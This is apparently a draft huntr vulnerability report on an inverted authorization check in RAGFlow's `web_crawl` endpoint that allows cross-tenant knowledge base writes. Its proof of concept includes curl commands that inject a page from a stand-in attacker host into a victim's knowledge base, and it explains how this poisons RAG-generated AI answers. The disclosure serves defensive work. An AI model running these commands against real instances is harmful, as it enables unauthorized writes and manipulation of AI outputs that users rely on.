# Inverted Authorization Check in `web_crawl` Endpoint Allows Cross-Tenant Knowledge Base Write ## meta platform: huntr program: RAGFlow asset: https://github.com/infiniflow/ragflow date: 2026-02-12 status: DRAFT ```` Repository URL: https://github.com/infiniflow/ragflow Package Manager: pip Version Affected: 0.24.0 Vulnerability Type: Incorrect Authorization CVSS: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: Low - User Interaction: None - Scope: Unchanged - Confidentiality: None - Integrity: High - Availability: High Title: Inverted authorization check in web_crawl allows cross-tenant knowledge base write Description: # Description The `web_crawl` endpoint in `api/apps/document_app.py` contains an inverted authorization check at line 116. The correct pattern (used in the `upload` function at line 86) is: if not check_kb_team_permission(kb, current_user.id): return get_json_result(data=False, message="No authorization.", ...) The `web_crawl` function is missing the `not` keyword: if check_kb_team_permission(kb, current_user.id): return get_json_result(data=False, message="No authorization.", ...) Since `check_kb_team_permission()` returns `True` when the user IS authorized (owner or team member), this inverted logic: - **Denies** authorized users (owner, team members) - **Allows** unauthorized users (any other authenticated user) After the check incorrectly passes, the function proceeds to crawl the attacker-supplied URL via `html2pdf()`, store the result in the victim's storage, insert a document record, and link it to the victim's tenant. # Proof of Concept ## Prerequisites - RAGFlow instance with two user accounts (attacker + victim) - Victim has a knowledge base with known `kb_id` ## Steps ```bash # Attacker injects document into victim's knowledge base curl -s -X POST "http://localhost/v1/document/web_crawl" \ -H "Authorization: Bearer ${ATTACKER_TOKEN}" \ -F "kb_id=${VICTIM_KB_ID}" \ -F "name=injected_document" \ -F "url=https://attacker.example.com/malicious-content.html" # Returns: {"code": 0, "data": true} (should be 401) # Legitimate owner is BLOCKED from their own KB curl -s -X POST "http://localhost/v1/document/web_crawl" \ -H "Authorization: Bearer ${VICTIM_TOKEN}" \ -F "kb_id=${VICTIM_KB_ID}" \ -F "name=legitimate_document" \ -F "url=https://example.com/content.html" # Returns: {"code": 401, "data": false, "message": "No authorization."} (should succeed) Impact: This vulnerability is capable of allowing any authenticated user to inject documents into any other user's knowledge base by exploiting an inverted authorization check. Injected documents are indexed by the RAG pipeline, enabling data poisoning of AI-generated responses. The inverted check also blocks legitimate owners from using web_crawl on their own knowledge bases. Occurrences: - Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/apps/document_app.py#L116 Description: Missing `not` keyword — `if check_kb_team_permission(kb, current_user.id):` denies authorized users and allows unauthorized users. Compare with correct pattern at line 86: `if not check_kb_team_permission(kb, current_user.id):`. - Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/common/check_team_permission.py#L25-L37 Description: `check_kb_team_permission()` returns `True` for authorized users (owner or team member). The missing `not` at the call site inverts the logic. References: - https://cwe.mitre.org/data/definitions/863.html — CWE-863: Incorrect Authorization - https://owasp.org/Top10/A01_2021-Broken_Access_Control/ — OWASP A01:2021 - https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/ — OWASP API1:2023 ````